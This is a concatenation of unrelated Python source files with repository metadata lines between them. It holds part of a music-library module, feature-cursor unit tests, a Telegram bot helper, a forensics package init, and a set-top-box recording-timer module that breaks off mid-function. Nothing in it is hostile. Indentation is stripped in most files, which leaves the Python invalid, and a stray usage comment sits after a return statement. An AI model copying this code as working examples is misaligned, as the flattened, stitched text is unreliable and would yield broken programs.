Only items present in the library when the rebuild is started
will be checked.
If this function is copooled, set "cofuncid" to enable pause/stop
buttons in the UI.
"""
print_d("Rebuilding, force is %s." % force, self)
task = Task(_("Library"), _("Checking mount points"))
if cofuncid:
task.copool(cofuncid)
for i, (point, items) in task.list(enumerate(self._masked.items())):
if ismount(point):
self._contents.update(items)
del(self._masked[point])
self.emit('added', list(items.values()))
yield True
task = Task(_("Library"), _("Scanning library"))
if cofuncid:
task.copool(cofuncid)
changed, removed = set(), set()
for i, (key, item) in task.list(enumerate(sorted(self.items()))):
            if key in self._contents and (force or not item.valid()):
self.reload(item, changed, removed)
# These numbers are pretty empirical. We should yield more
# often than we emit signals; that way the main loop stays
# interactive and doesn't get bogged down in updates.
if len(changed) > 100:
self.emit('changed', changed)
changed = set()
if len(removed) > 100:
self.emit('removed', removed)
removed = set()
if len(changed) > 5 or i % 100 == 0:
yield True
print_d("Removing %d, changing %d." % (len(removed), len(changed)),
self)
if removed:
self.emit('removed', removed)
if changed:
self.emit('changed', changed)
for value in self.scan(paths, exclude, cofuncid):
yield value
def add_filename(self, filename, add=True):
"""Add a file based on its filename.
Subclasses must override this to open the file correctly.
"""
raise NotImplementedError
def contains_filename(self, filename):
"""Returns if a song for the passed filename is in the library.
Returns:
bool
"""
raise NotImplementedError
def scan(self, paths, exclude=[], cofuncid=None):
def need_yield(last_yield=[0]):
current = time.time()
if abs(current - last_yield[0]) > 0.015:
last_yield[0] = current
return True
return False
def need_added(last_added=[0]):
current = time.time()
if abs(current - last_added[0]) > 1.0:
last_added[0] = current
return True
return False
# first scan each path for new files
paths_to_load = []
for scan_path in paths:
print_d("Scanning %r." % scan_path)
desc = _("Scanning %s") % (fsn2text(unexpand(scan_path)))
with Task(_("Library"), desc) as task:
if cofuncid:
task.copool(cofuncid)
for real_path in iter_paths(scan_path, exclude=exclude):
if need_yield():
task.pulse()
yield
# skip unknown file extensions
if not formats.filter(real_path):
continue
# already loaded
if self.contains_filename(real_path):
continue
paths_to_load.append(real_path)
yield
# then (try to) load all new files
with Task(_("Library"), _("Loading files")) as task:
if cofuncid:
task.copool(cofuncid)
added = []
for real_path in task.gen(paths_to_load):
item = self.add_filename(real_path, False)
if item is not None:
added.append(item)
if len(added) > 100 or need_added():
self.add(added)
added = []
yield
if added and need_yield():
yield
if added:
self.add(added)
added = []
yield True
def get_content(self):
"""Return visible and masked items"""
items = list(self.values())
for masked in self._masked.values():
items.extend(masked.values())
# Item keys are often based on filenames, in which case
# sorting takes advantage of the filesystem cache when we
# reload/rescan the files.
items.sort(key=lambda item: item.key)
return items
def masked(self, item):
"""Return true if the item is in the library but masked."""
try:
point = item.mountpoint
except AttributeError:
# Checking a key.
for point in self._masked.values():
if item in point:
return True
else:
# Checking a full item.
return item in self._masked.get(point, {}).values()
def unmask(self, point):
print_d("Unmasking %r." % point, self)
items = self._masked.pop(point, {})
if items:
self.add(items.values())
def mask(self, point):
print_d("Masking %r." % point, self)
removed = {}
for item in self.values():
if item.mountpoint == point:
removed[item.key] = item
if removed:
self.remove(removed.values())
self._masked.setdefault(point, {}).update(removed)
@property
def masked_mount_points(self):
"""List of mount points that contain masked items"""
return list(self._masked.keys())
def get_masked(self, mount_point):
"""List of items for a mount point"""
return list(self._masked.get(mount_point, {}).values())
def remove_masked(self, mount_point):
"""Remove all songs for a masked point"""
self._masked.pop(mount_point, {})
class SongFileLibrary(SongLibrary, FileLibrary):
"""A library containing song files.
Pickles contents to disk as `FileLibrary`"""
def __init__(self, name=None):
print_d("Initializing SongFileLibrary \"%s\"." % name)
super(SongFileLibrary, self).__init__(name)
def contains_filename(self, filename):
key = normalize_path(filename, True)
return key in self._contents
def get_filename(self, filename):
key = normalize_path(filename, True)
return self._contents.get(key)
def add_filename(self, filename, add=True):
"""Add a song to the library based on filename.
If 'add' is true, the song will be added and the 'added' signal
may be fired.
Example (add=False):
load many songs and call Library.add(songs) to add all in one go.
The song is returned if it is in the library after this call.
Otherwise, None is returned.
"""
key = normalize_path(filename, True)
song = None
if key not in self._contents:
song = MusicFile(filename)
if song and add:
self.add([song])
else:
print_d("Already got file %r." % filename)
song = self._contents[key]
return song
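        # Usage sketch (filename illustrative):
        #   library = SongFileLibrary("main")
        #   song = library.add_filename("/music/track.flac")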
|
ptitjes/quodlibet
|
quodlibet/library/libraries.py
|
Python
|
gpl-2.0
| 28,163
|
import pytest
from roam_tests import objects
from roam.infodock import FeatureCursor, NoFeature
layer = objects.newmemorylayer()
layer = objects.addfeaturestolayer(layer, 2)
features = layer.getFeatures()
featureone = next(features)
featuretwo = next(features)
@pytest.fixture
def cursor():
return FeatureCursor(layer=layer, features=[featureone, featuretwo])
def test_should_start_at_index_0(cursor):
assert cursor.index == 0
def test_next_should_move_index(cursor):
cursor.next()
assert cursor.index == 1
def test_next_should_wrap_to_start_when_on_last(cursor):
last = len(cursor.features) - 1
cursor.index = last
assert cursor.index == last
cursor.next()
assert cursor.index == 0
def test_back_should_wrap_to_end_when_on_first(cursor):
last = len(cursor.features) - 1
assert cursor.index == 0
cursor.back()
assert cursor.index == last
def test_should_return_feature_at_index(cursor):
assert cursor.feature.id() == featureone.id()
cursor.next()
assert cursor.feature.id() == featuretwo.id()
def test_should_raise_no_feature_on_invalid_index(cursor):
cursor.index = 99
with pytest.raises(NoFeature):
cursor.feature
|
DMS-Aus/Roam
|
src/roam_tests/test_featurecursor.py
|
Python
|
gpl-2.0
| 1,206
|
################################################################################
# new_users_saver function
################################################################################
def newusers(m):
dict_updater()
un = m.from_user.username
if un not in DBDIC:
uid = m.from_user.id
DBDIC[un] = [uid,0]
if hasattr(m, 'new_chat_participant'):
un = m.new_chat_participant.username
if un not in DBDIC:
uid = m.new_chat_participant.id
DBDIC[un] = [uid,0]
dict_saver()
################################################################################
# "newusers" saves new users in the dictionary
# (see dict_updater_saver.py for "dict_updater()" and "dict_saver()")
################################################################################
|
acasadoquijada/Telegram-bot-stuff
|
Stuff/new_users_saver.py
|
Python
|
gpl-2.0
| 825
|
# DFF -- An Open Source Digital Forensics Framework
# Copyright (C) 2009-2011 ArxSys
# This program is free software, distributed under the terms of
# the GNU General Public License Version 2. See the LICENSE file
# at the top of the source tree.
#
# See http://www.digital-forensic.org for more information about this
# project. Please do not directly contact any of the maintainers of
# DFF for assistance; the project provides a web site, mailing lists
# and IRC channels for your use.
#
# Author(s):
# Frederic Baguelin <fba@digital-forensic.org>
__version__ = "${API_EVENT_VERSION}"
__all__ = ["libevents"]
|
halbbob/dff
|
api/events/__init__.py
|
Python
|
gpl-2.0
| 617
|
import os
from enigma import eEPGCache, getBestPlayableServiceReference, \
eServiceReference, iRecordableService, quitMainloop, eActionMap
from Components.config import config
from Components.UsageConfig import defaultMoviePath
from Components.TimerSanityCheck import TimerSanityCheck
from Screens.MessageBox import MessageBox
import Screens.Standby
from Tools import Directories, Notifications, ASCIItranslit, Trashcan
from Tools.XMLTools import stringToXML
import timer
import xml.etree.cElementTree
import NavigationInstance
from ServiceReference import ServiceReference
from time import localtime, strftime, ctime, time
from bisect import insort
from sys import maxint
# ok, for descriptions etc we have:
# service reference (to get the service name)
# name (title)
# description (description)
# event data (ONLY for time adjustments etc.)
# parses an event, and gives out a (begin, end, name, duration, eit)-tuple.
# begin and end will be corrected
def parseEvent(ev, description = True):
if description:
name = ev.getEventName()
description = ev.getShortDescription()
if description == "":
description = ev.getExtendedDescription()
else:
name = ""
description = ""
begin = ev.getBeginTime()
end = begin + ev.getDuration()
eit = ev.getEventId()
begin -= config.recording.margin_before.value * 60
end += config.recording.margin_after.value * 60
return (begin, end, name, description, eit)
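# Usage sketch (ev is an EPG event object as used above):
#   begin, end, name, description, eit = parseEvent(ev)
# begin/end already include the configured recording margins.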
class AFTEREVENT:
NONE = 0
STANDBY = 1
DEEPSTANDBY = 2
AUTO = 3
def findSafeRecordPath(dirname):
if not dirname:
return None
from Components import Harddisk
dirname = os.path.realpath(dirname)
mountpoint = Harddisk.findMountPoint(dirname)
if mountpoint in ('/', '/media'):
print '[RecordTimer] media is not mounted:', dirname
return None
if not os.path.isdir(dirname):
try:
os.makedirs(dirname)
except Exception, ex:
print '[RecordTimer] Failed to create dir "%s":' % dirname, ex
return None
return dirname
def checkForRecordings():
if NavigationInstance.instance.getRecordings():
return True
rec_time = NavigationInstance.instance.RecordTimer.getNextTimerTime()
return rec_time > 0 and (rec_time - time()) < 360
# please do not translate log messages
class RecordTimerEntry(timer.TimerEntry, object):
######### the following static methods and members are only in use when the box is in (soft) standby
wasInStandby = False
wasInDeepStandby = False
receiveRecordEvents = False
@staticmethod
def keypress(key=None, flag=1):
if flag and (RecordTimerEntry.wasInStandby or RecordTimerEntry.wasInDeepStandby):
RecordTimerEntry.wasInStandby = False
RecordTimerEntry.wasInDeepStandby = False
eActionMap.getInstance().unbindAction('', RecordTimerEntry.keypress)
@staticmethod
def setWasInDeepStandby():
RecordTimerEntry.wasInDeepStandby = True
eActionMap.getInstance().bindAction('', -maxint - 1, RecordTimerEntry.keypress)
@staticmethod
def setWasInStandby():
if not RecordTimerEntry.wasInStandby:
if not RecordTimerEntry.wasInDeepStandby:
eActionMap.getInstance().bindAction('', -maxint - 1, RecordTimerEntry.keypress)
RecordTimerEntry.wasInDeepStandby = False
RecordTimerEntry.wasInStandby = True
@staticmethod
def shutdown():
quitMainloop(1)
@staticmethod
def staticGotRecordEvent(recservice, event):
if event == iRecordableService.evEnd:
print "RecordTimer.staticGotRecordEvent(iRecordableService.evEnd)"
			if not checkForRecordings():
				print "No recordings busy or scheduled within 6 minutes, so shutdown"
RecordTimerEntry.shutdown() # immediate shutdown
elif event == iRecordableService.evStart:
print "RecordTimer.staticGotRecordEvent(iRecordableService.evStart)"
@staticmethod
def stopTryQuitMainloop():
print "RecordTimer.stopTryQuitMainloop"
NavigationInstance.instance.record_event.remove(RecordTimerEntry.staticGotRecordEvent)
RecordTimerEntry.receiveRecordEvents = False
@staticmethod
def TryQuitMainloop():
if not RecordTimerEntry.receiveRecordEvents and Screens.Standby.inStandby:
print "RecordTimer.TryQuitMainloop"
NavigationInstance.instance.record_event.append(RecordTimerEntry.staticGotRecordEvent)
RecordTimerEntry.receiveRecordEvents = True
# send fake event.. to check if another recordings are running or
# other timers start in a few seconds
RecordTimerEntry.staticGotRecordEvent(None, iRecordableService.evEnd)
#################################################################
def __init__(self, serviceref, begin, end, name, description, eit, disabled = False, justplay = False, afterEvent = AFTEREVENT.AUTO, checkOldTimers = False, dirname = None, tags = None, descramble = True, record_ecm = False, always_zap = False):
timer.TimerEntry.__init__(self, int(begin), int(end))
if checkOldTimers == True:
if self.begin < time() - 1209600:
self.begin = int(time())
if self.end < self.begin:
self.end = self.begin
assert isinstance(serviceref, ServiceReference)
if serviceref.isRecordable():
self.service_ref = serviceref
else:
self.service_ref = ServiceReference(None)
self.eit = eit
self.dontSave = False
self.name = name
self.description = description
self.disabled = disabled
self.timer = None
self.__record_service = None
self.start_prepare = 0
self.justplay = justplay
self.always_zap = always_zap
self.afterEvent = afterEvent
self.dirname = dirname
self.dirnameHadToFallback = False
self.autoincrease = False
self.autoincreasetime = 3600 * 24 # 1 day
self.tags = tags or []
self.descramble = descramble
self.record_ecm = record_ecm
self.log_entries = []
self.resetState()
def __repr__(self):
return "RecordTimerEntry(name=%s, begin=%s, serviceref=%s, justplay=%s)" % (self.name, ctime(self.begin), self.service_ref, self.justplay)
def log(self, code, msg):
self.log_entries.append((int(time()), code, msg))
print "[TIMER]", msg
def calculateFilename(self):
service_name = self.service_ref.getServiceName()
begin_date = strftime("%Y%m%d %H%M", localtime(self.begin))
print "begin_date: ", begin_date
print "service_name: ", service_name
print "name:", self.name
print "description: ", self.description
filename = begin_date + " - " + service_name
if self.name:
if config.recording.filename_composition.value == "short":
filename = strftime("%Y%m%d", localtime(self.begin)) + " - " + self.name
elif config.recording.filename_composition.value == "long":
filename += " - " + self.name + " - " + self.description
else:
filename += " - " + self.name # standard
if config.recording.ascii_filenames.value:
filename = ASCIItranslit.legacyEncode(filename)
if not self.dirname:
dirname = findSafeRecordPath(defaultMoviePath())
else:
dirname = findSafeRecordPath(self.dirname)
if dirname is None:
dirname = findSafeRecordPath(defaultMoviePath())
self.dirnameHadToFallback = True
if not dirname:
return None
self.Filename = Directories.getRecordingFilename(filename, dirname)
self.log(0, "Filename calculated as: '%s'" % self.Filename)
return self.Filename
def tryPrepare(self):
if self.justplay:
return True
else:
if not self.calculateFilename():
self.do_backoff()
self.start_prepare = time() + self.backoff
return False
rec_ref = self.service_ref and self.service_ref.ref
if rec_ref and rec_ref.flags & eServiceReference.isGroup:
rec_ref = getBestPlayableServiceReference(rec_ref, eServiceReference())
if not rec_ref:
self.log(1, "'get best playable service for group... record' failed")
return False
self.record_service = rec_ref and NavigationInstance.instance.recordService(rec_ref)
if not self.record_service:
self.log(1, "'record service' failed")
return False
if self.repeated:
epgcache = eEPGCache.getInstance()
queryTime=self.begin+(self.end-self.begin)/2
evt = epgcache.lookupEventTime(rec_ref, queryTime)
if evt:
self.description = evt.getShortDescription()
if self.description == "":
self.description = evt.getExtendedDescription()
event_id = evt.getEventId()
else:
event_id = -1
else:
event_id = self.eit
if event_id is None:
event_id = -1
prep_res=self.record_service.prepare(self.Filename + ".ts", self.begin, self.end, event_id, self.name.replace("\n", ""), self.description.replace("\n", ""), ' '.join(self.tags), self.descramble, self.record_ecm)
if prep_res:
if prep_res == -255:
self.log(4, "failed to write meta information")
else:
self.log(2, "'prepare' failed: error %d" % prep_res)
				# we must calc the new start time before the stopRecordService call, because in
				# Screens/Standby.py TryQuitMainloop tries to get the next start time in the evEnd event handler...
self.do_backoff()
self.start_prepare = time() + self.backoff
NavigationInstance.instance.stopRecordService(self.record_service)
self.record_service = None
return False
return True
def do_backoff(self):
if self.backoff == 0:
self.backoff = 5
else:
self.backoff *= 2
if self.backoff > 100:
self.backoff = 100
self.log(10, "backoff: retry in %d seconds" % self.backoff)
def activate(self):
next_state = self.state + 1
self.log(5, "activating state %d" % next_state)
if next_state == 1:
if self.always_zap:
if Screens.Standby.inStandby:
self.log(5, "wakeup and zap to recording service")
RecordTimerEntry.setWasInStandby()
#set service to zap after standby
Screens.Standby.inStandby.prev_running_service = self.service_ref.ref
Screens.Standby.inStandby.paused_service = None
#wakeup standby
Screens.Standby.inStandby.Power()
else:
if RecordTimerEntry.wasInDeepStandby:
RecordTimerEntry.setWasInStandby()
cur_zap_ref = NavigationInstance.instance.getCurrentlyPlayingServiceReference()
					if cur_zap_ref and not cur_zap_ref.getPath(): # we do not zap away if it is not a live service
Notifications.AddNotification(MessageBox, _("In order to record a timer, the TV was switched to the recording service!\n"), type=MessageBox.TYPE_INFO, timeout=20)
self.failureCB(True)
self.log(5, "zap to recording service")
if next_state == self.StatePrepared:
if self.tryPrepare():
self.log(6, "prepare ok, waiting for begin")
# create file to "reserve" the filename
# because another recording at the same time on another service can try to record the same event
# i.e. cable / sat.. then the second recording needs an own extension... when we create the file
# here than calculateFilename is happy
if not self.justplay:
open(self.Filename + ".ts", "w").close()
# Give the Trashcan a chance to clean up
try:
Trashcan.instance.cleanIfIdle(self.Filename)
except Exception, e:
print "[TIMER] Failed to call Trashcan.instance.cleanIfIdle()"
print "[TIMER] Error:", e
# fine. it worked, resources are allocated.
self.next_activation = self.begin
self.backoff = 0
return True
self.log(7, "prepare failed")
if self.first_try_prepare:
self.first_try_prepare = False
cur_ref = NavigationInstance.instance.getCurrentlyPlayingServiceReference()
if cur_ref and not cur_ref.getPath():
if Screens.Standby.inStandby:
self.failureCB(True)
elif not config.recording.asktozap.value:
self.log(8, "asking user to zap away")
Notifications.AddNotificationWithCallback(self.failureCB, MessageBox, _("A timer failed to record!\nDisable TV and try again?\n"), timeout=20, default=True)
else: # zap without asking
self.log(9, "zap without asking")
Notifications.AddNotification(MessageBox, _("In order to record a timer, the TV was switched to the recording service!\n"), type=MessageBox.TYPE_INFO, timeout=20)
self.failureCB(True)
elif cur_ref:
self.log(8, "currently running service is not a live service.. so stop it makes no sense")
else:
self.log(8, "currently no service running... so we dont need to stop it")
return False
elif next_state == self.StateRunning:
# if this timer has been cancelled, just go to "end" state.
if self.cancelled:
return True
if self.justplay:
if Screens.Standby.inStandby:
self.log(11, "wakeup and zap")
RecordTimerEntry.setWasInStandby()
#set service to zap after standby
Screens.Standby.inStandby.prev_running_service = self.service_ref.ref
Screens.Standby.inStandby.paused_service = None
#wakeup standby
Screens.Standby.inStandby.Power()
else:
if RecordTimerEntry.wasInDeepStandby:
RecordTimerEntry.setWasInStandby()
self.log(11, "zapping")
NavigationInstance.instance.playService(self.service_ref.ref)
return True
else:
self.log(11, "start recording")
if RecordTimerEntry.wasInDeepStandby:
RecordTimerEntry.keypress()
if Screens.Standby.inStandby: #In case some plugin did put the receiver already in standby
config.misc.standbyCounter.value = 0
else:
Notifications.AddNotification(Screens.Standby.Standby, StandbyCounterIncrease=False)
record_res = self.record_service.start()
if record_res:
self.log(13, "start record returned %d" % record_res)
self.do_backoff()
# retry
self.begin = time() + self.backoff
return False
# Tell the trashcan we started recording. The trashcan gets events,
# but cannot tell what the associated path is.
Trashcan.instance.markDirty(self.Filename)
return True
elif next_state == self.StateEnded:
old_end = self.end
if self.setAutoincreaseEnd():
self.log(12, "autoincrase recording %d minute(s)" % int((self.end - old_end)/60))
self.state -= 1
return True
self.log(12, "stop recording")
if not self.justplay:
NavigationInstance.instance.stopRecordService(self.record_service)
self.record_service = None
			if not checkForRecordings():
if self.afterEvent == AFTEREVENT.DEEPSTANDBY or self.afterEvent == AFTEREVENT.AUTO and (Screens.Standby.inStandby or RecordTimerEntry.wasInStandby) and not config.misc.standbyCounter.value:
if not Screens.Standby.inTryQuitMainloop:
if Screens.Standby.inStandby:
RecordTimerEntry.TryQuitMainloop()
else:
Notifications.AddNotificationWithCallback(self.sendTryQuitMainloopNotification, MessageBox, _("A finished record timer wants to shut down\nyour receiver. Shutdown now?"), timeout=20, default=True)
elif self.afterEvent == AFTEREVENT.STANDBY or self.afterEvent == AFTEREVENT.AUTO and RecordTimerEntry.wasInStandby:
if not Screens.Standby.inStandby:
Notifications.AddNotificationWithCallback(self.sendStandbyNotification, MessageBox, _("A finished record timer wants to set your\nreceiver to standby. Do that now?"), timeout=20, default=True)
else:
RecordTimerEntry.keypress()
return True
def setAutoincreaseEnd(self, entry = None):
if not self.autoincrease:
return False
if entry is None:
new_end = int(time()) + self.autoincreasetime
else:
new_end = entry.begin - 30
dummyentry = RecordTimerEntry(self.service_ref, self.begin, new_end, self.name, self.description, self.eit, disabled=True, justplay = self.justplay, afterEvent = self.afterEvent, dirname = self.dirname, tags = self.tags)
dummyentry.disabled = self.disabled
timersanitycheck = TimerSanityCheck(NavigationInstance.instance.RecordTimer.timer_list, dummyentry)
if not timersanitycheck.check():
simulTimerList = timersanitycheck.getSimulTimerList()
if simulTimerList is not None and len(simulTimerList) > 1:
new_end = simulTimerList[1].begin
				new_end -= 30 # leave 30 seconds of prepare time
if new_end <= time():
return False
self.end = new_end
return True
def sendStandbyNotification(self, answer):
RecordTimerEntry.keypress()
if answer:
Notifications.AddNotification(Screens.Standby.Standby)
def sendTryQuitMainloopNotification(self, answer):
RecordTimerEntry.keypress()
if answer:
Notifications.AddNotification(Screens.Standby.TryQuitMainloop, 1)
def getNextActivation(self):
if self.state == self.StateEnded:
return self.end
next_state = self.state + 1
return {self.StatePrepared: self.start_prepare,
self.StateRunning: self.begin,
self.StateEnded: self.end }[next_state]
def failureCB(self, answer):
if answer == True:
self.log(13, "ok, zapped away")
#NavigationInstance.instance.stopUserServices()
NavigationInstance.instance.playService(self.service_ref.ref)
else:
self.log(14, "user didn't want to zap away, record will probably fail")
def timeChanged(self):
old_prepare = self.start_prepare
self.start_prepare = self.begin - self.prepare_time
self.backoff = 0
if int(old_prepare) != int(self.start_prepare):
self.log(15, "record time changed, start prepare is now: %s" % ctime(self.start_prepare))
def gotRecordEvent(self, record, event):
# TODO: this is not working (never true), please fix. (comparing two swig wrapped ePtrs)
if self.__record_service.__deref__() != record.__deref__():
return
self.log(16, "record event %d" % event)
if event == iRecordableService.evRecordWriteError:
print "WRITE ERROR on recording, disk full?"
			# show notification. the 'id' will make sure that it is
			# displayed only once, even if several timers fail at the
			# same time (which is very likely when the disk is full)
Notifications.AddPopup(text = _("Write error while recording. Disk full?\n"), type = MessageBox.TYPE_ERROR, timeout = 0, id = "DiskFullMessage")
			# ok, the recording has been stopped. we need to properly note
			# that in our state, while keeping the possibility to retry.
# TODO: this has to be done.
elif event == iRecordableService.evStart:
text = _("A record has been started:\n%s") % self.name
notify = config.usage.show_message_when_recording_starts.value and not Screens.Standby.inStandby
if self.dirnameHadToFallback:
text = '\n'.join((text, _("Please note that the previously selected media could not be accessed and therefore the default directory is being used instead.")))
notify = True
if notify:
Notifications.AddPopup(text = text, type = MessageBox.TYPE_INFO, timeout = 3)
elif event == iRecordableService.evRecordAborted:
NavigationInstance.instance.RecordTimer.removeEntry(self)
	# we have record_service as a property to automatically subscribe to record service events
def setRecordService(self, service):
if self.__record_service is not None:
print "[remove callback]"
NavigationInstance.instance.record_event.remove(self.gotRecordEvent)
self.__record_service = service
if self.__record_service is not None:
print "[add callback]"
NavigationInstance.instance.record_event.append(self.gotRecordEvent)
record_service = property(lambda self: self.__record_service, setRecordService)
def createTimer(xml):
begin = int(xml.get("begin"))
end = int(xml.get("end"))
serviceref = ServiceReference(xml.get("serviceref").encode("utf-8"))
description = xml.get("description").encode("utf-8")
repeated = xml.get("repeated").encode("utf-8")
disabled = long(xml.get("disabled") or "0")
justplay = long(xml.get("justplay") or "0")
always_zap = long(xml.get("always_zap") or "0")
afterevent = str(xml.get("afterevent") or "nothing")
afterevent = {
"nothing": AFTEREVENT.NONE,
"standby": AFTEREVENT.STANDBY,
"deepstandby": AFTEREVENT.DEEPSTANDBY,
"auto": AFTEREVENT.AUTO
}[afterevent]
eit = xml.get("eit")
if eit and eit != "None":
		eit = long(eit)
else:
eit = None
location = xml.get("location")
if location and location != "None":
location = location.encode("utf-8")
else:
location = None
tags = xml.get("tags")
if tags and tags != "None":
tags = tags.encode("utf-8").split(' ')
else:
tags = None
descramble = int(xml.get("descramble") or "1")
record_ecm = int(xml.get("record_ecm") or "0")
name = xml.get("name").encode("utf-8")
#filename = xml.get("filename").encode("utf-8")
entry = RecordTimerEntry(serviceref, begin, end, name, description, eit, disabled, justplay, afterevent, dirname = location, tags = tags, descramble = descramble, record_ecm = record_ecm, always_zap = always_zap)
entry.repeated = int(repeated)
for l in xml.findall("log"):
time = int(l.get("time"))
code = int(l.get("code"))
msg = l.text.strip().encode("utf-8")
entry.log_entries.append((time, code, msg))
return entry
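# Illustrative input (an assumption inferred from the attributes read above,
# not an excerpt from a real timers.xml) -- createTimer() expects an element like:
#   <timer begin="1300000000" end="1300003600"
#          serviceref="1:0:1:445D:453:1:C00000:0:0:0:" name="News"
#          description="" repeated="0" afterevent="auto" disabled="0"
#          justplay="0" always_zap="0" descramble="1" record_ecm="0">
#       <log time="1300000000" code="15">record time changed</log>
#   </timer>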
class RecordTimer(timer.Timer):
def __init__(self):
timer.Timer.__init__(self)
self.Filename = Directories.resolveFilename(Directories.SCOPE_CONFIG, "timers.xml")
try:
self.loadTimer()
except IOError:
print "unable to load timers from file!"
def doActivate(self, w):
# when activating a timer which has already passed,
		# simply abort the timer. don't run through all the stages.
if w.shouldSkip():
w.state = RecordTimerEntry.StateEnded
else:
# when active returns true, this means "accepted".
# otherwise, the current state is kept.
# the timer entry itself will fix up the delay then.
if w.activate():
w.state += 1
self.timer_list.remove(w)
		# did this timer reach its last state?
if w.state < RecordTimerEntry.StateEnded:
# no, sort it into active list
insort(self.timer_list, w)
else:
# yes. Process repeated, and re-add.
if w.repeated:
w.processRepeated()
w.state = RecordTimerEntry.StateWaiting
w.first_try_prepare = True
self.addTimerEntry(w)
else:
# Remove old timers as set in config
self.cleanupDaily(config.recording.keep_timers.value)
insort(self.processed_timers, w)
self.stateChanged(w)
def isRecording(self):
for timer in self.timer_list:
if timer.isRunning() and not timer.justplay:
return True
return False
def loadTimer(self):
# TODO: PATH!
if not Directories.fileExists(self.Filename):
return
try:
doc = xml.etree.cElementTree.parse(self.Filename)
except SyntaxError:
from Tools.Notifications import AddPopup
from Screens.MessageBox import MessageBox
AddPopup(_("The timer file (timers.xml) is corrupt and could not be loaded."), type = MessageBox.TYPE_ERROR, timeout = 0, id = "TimerLoadFailed")
print "timers.xml failed to load!"
try:
import os
os.rename(self.Filename, self.Filename + "_old")
except (IOError, OSError):
print "renaming broken timer failed"
return
except IOError:
print "timers.xml not found!"
return
root = doc.getroot()
# put out a message when at least one timer overlaps
checkit = True
for timer in root.findall("timer"):
newTimer = createTimer(timer)
if (self.record(newTimer, True, dosave=False) is not None) and (checkit == True):
from Tools.Notifications import AddPopup
from Screens.MessageBox import MessageBox
AddPopup(_("Timer overlap in timers.xml detected!\nPlease recheck it!"), type = MessageBox.TYPE_ERROR, timeout = 0, id = "TimerLoadFailed")
				checkit = False # at the moment it is enough to display the message once
def saveTimer(self):
#root_element = xml.etree.cElementTree.Element('timers')
#root_element.text = "\n"
#for timer in self.timer_list + self.processed_timers:
# some timers (instant records) don't want to be saved.
# skip them
#if timer.dontSave:
#continue
#t = xml.etree.cElementTree.SubElement(root_element, 'timers')
#t.set("begin", str(int(timer.begin)))
#t.set("end", str(int(timer.end)))
#t.set("serviceref", str(timer.service_ref))
#t.set("repeated", str(timer.repeated))
#t.set("name", timer.name)
#t.set("description", timer.description)
#t.set("afterevent", str({
# AFTEREVENT.NONE: "nothing",
# AFTEREVENT.STANDBY: "standby",
# AFTEREVENT.DEEPSTANDBY: "deepstandby",
# AFTEREVENT.AUTO: "auto"}))
#if timer.eit is not None:
# t.set("eit", str(timer.eit))
#if timer.dirname is not None:
# t.set("location", str(timer.dirname))
#t.set("disabled", str(int(timer.disabled)))
#t.set("justplay", str(int(timer.justplay)))
#t.text = "\n"
#t.tail = "\n"
#for time, code, msg in timer.log_entries:
#l = xml.etree.cElementTree.SubElement(t, 'log')
#l.set("time", str(time))
#l.set("code", str(code))
#l.text = str(msg)
#l.tail = "\n"
#doc = xml.etree.cElementTree.ElementTree(root_element)
#doc.write(self.Filename)
		lines = []
		lines.append('<?xml version="1.0" ?>\n')
		lines.append('<timers>\n')
		for timer in self.timer_list + self.processed_timers:
			if timer.dontSave:
				continue
			lines.append('<timer')
			lines.append(' begin="' + str(int(timer.begin)) + '"')
			lines.append(' end="' + str(int(timer.end)) + '"')
			lines.append(' serviceref="' + stringToXML(str(timer.service_ref)) + '"')
			lines.append(' repeated="' + str(int(timer.repeated)) + '"')
			lines.append(' name="' + str(stringToXML(timer.name)) + '"')
			lines.append(' description="' + str(stringToXML(timer.description)) + '"')
			lines.append(' afterevent="' + str(stringToXML({
				AFTEREVENT.NONE: "nothing",
				AFTEREVENT.STANDBY: "standby",
				AFTEREVENT.DEEPSTANDBY: "deepstandby",
				AFTEREVENT.AUTO: "auto"
				}[timer.afterEvent])) + '"')
			if timer.eit is not None:
				lines.append(' eit="' + str(timer.eit) + '"')
			if timer.dirname is not None:
				lines.append(' location="' + str(stringToXML(timer.dirname)) + '"')
			if timer.tags is not None:
				lines.append(' tags="' + str(stringToXML(' '.join(timer.tags))) + '"')
			lines.append(' disabled="' + str(int(timer.disabled)) + '"')
			lines.append(' justplay="' + str(int(timer.justplay)) + '"')
			lines.append(' always_zap="' + str(int(timer.always_zap)) + '"')
			lines.append(' descramble="' + str(int(timer.descramble)) + '"')
			lines.append(' record_ecm="' + str(int(timer.record_ecm)) + '"')
			lines.append('>\n')
			if config.recording.debug.value:
				for time, code, msg in timer.log_entries:
					lines.append('<log')
					lines.append(' code="' + str(code) + '"')
					lines.append(' time="' + str(time) + '"')
					lines.append('>')
					lines.append(str(stringToXML(msg)))
					lines.append('</log>\n')
			lines.append('</timer>\n')
		lines.append('</timers>\n')
		f = open(self.Filename + ".writing", "w")
		for x in lines:
			f.write(x)
		f.flush()
		import os
		os.fsync(f.fileno())
		f.close()
		os.rename(self.Filename + ".writing", self.Filename)
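	# Note on the save sequence above: writing to "<Filename>.writing", then
	# flush() + os.fsync(), then os.rename() makes the save atomic on POSIX
	# filesystems, so a crash can never leave a truncated timers.xml behind.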
def getNextZapTime(self):
now = time()
for timer in self.timer_list:
if not timer.justplay or timer.begin < now:
continue
return timer.begin
return -1
def getNextRecordingTime(self):
now = time()
for timer in self.timer_list:
next_act = timer.getNextActivation()
if timer.justplay or next_act < now:
continue
return next_act
return -1
def getNextTimerTime(self):
now = time()
for timer in self.timer_list:
next_act = timer.getNextActivation()
if next_act < now:
continue
return next_act
return -1
def isNextRecordAfterEventActionAuto(self):
now = time()
t = None
for timer in self.timer_list:
if timer.justplay or timer.begin < now:
continue
if t is None or t.begin == timer.begin:
t = timer
if t.afterEvent == AFTEREVENT.AUTO:
return True
return False
	def record(self, entry, ignoreTSC=False, dosave=True): # called by loadTimer with dosave=False
timersanitycheck = TimerSanityCheck(self.timer_list,entry)
if not timersanitycheck.check():
if ignoreTSC != True:
print "timer conflict detected!"
print timersanitycheck.getSimulTimerList()
return timersanitycheck.getSimulTimerList()
else:
print "ignore timer conflict"
elif timersanitycheck.doubleCheck():
print "ignore double timer"
return None
entry.timeChanged()
print "[Timer] Record " + str(entry)
entry.Timer = self
self.addTimerEntry(entry)
if dosave:
self.saveTimer()
return None
def isInTimer(self, eventid, begin, duration, service):
returnValue = None
type = 0
time_match = 0
bt = None
end = begin + duration
refstr = str(service)
for x in self.timer_list:
check = x.service_ref.ref.toString() == refstr
if not check:
sref = x.service_ref.ref
parent_sid = sref.getUnsignedData(5)
parent_tsid = sref.getUnsignedData(6)
